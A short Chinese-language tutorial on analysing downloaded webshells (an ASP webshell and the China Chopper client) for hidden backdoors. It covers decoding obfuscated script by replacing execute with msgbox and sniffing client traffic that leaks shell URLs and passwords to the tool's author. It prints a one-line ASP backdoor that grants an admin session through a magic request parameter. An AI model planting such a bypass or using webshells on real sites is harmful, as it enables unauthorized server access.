webshell後門分析
什麼是WebShell
顧名思義,“web”的含義是需要服務器開放web服務;“shell”的含義是取得對服務器某種程度上操作權限。webshell常常被稱爲匿名用戶(入侵者)通過網站端口對網站服務器的某種程度上操作的權限。由於webshell其大多是以動態腳本的形式出現,也有人稱之爲網站的後門工具。
很多時候我們下載很多別人的webshell,我們要去判斷這個webshell有沒有後門,有的開發者通過後門讓使用者中病毒,同時令目標網站有後門,從而獲取我們的資源
(其實很多廣告就是一種後門)
php,asp,jsp等都可以用記事本打開
首先先把密碼改了
大馬後門分析
1、解密腳本代碼
通過查找代碼非法登錄幾個關鍵字,發現這段代碼是經過加密的,於是把函數execute改爲msgbox這個函數, 進行解密明文輸出
之後將文件格式改爲VBS腳本執行
2、分析後門代碼
if request("%")="%" then
Session("web2a2dmin") = UserPass
URL()
end if
3、編寫後門利用工具
中國菜刀一句話後門分析
菜刀與大馬不同 ,才用的CS框架,看不見源代碼
因此通過協議來看有沒有後門
打開WSockExpert軟件,也可以選擇其它抓包軟件,選擇需要監聽的“中國菜刀”程序進程,雙擊
這個抓包軟件可以針對windows下的進程進行抓包
在包中可以看見文件名
有一個包有一段代碼開頭爲 密碼=
採用base64解密代碼
(有可能有的時候兩層)
解碼之後發現這段代碼是把使用者主機名(菜刀鏈接地址)+URL+密碼 發送給了開發者
其它腳本後門分析
我們可以通過通信解決有沒有後門
最後在登錄狀態下
密碼框 查看元素 網絡
之後點擊登錄
仔細觀察文件那裏
點開之後可以看到也是把我們訪問的文件發送給開發者了